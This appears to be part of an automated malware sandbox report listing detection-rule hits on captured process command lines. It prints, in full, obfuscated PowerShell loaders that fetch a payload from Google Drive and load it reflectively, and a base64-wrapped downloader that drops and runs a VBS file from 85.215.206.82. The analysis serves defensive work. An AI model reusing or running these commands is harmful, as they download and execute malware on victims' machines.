                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , ProcessId: 3068, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDth
                  Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDth
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))", CommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; 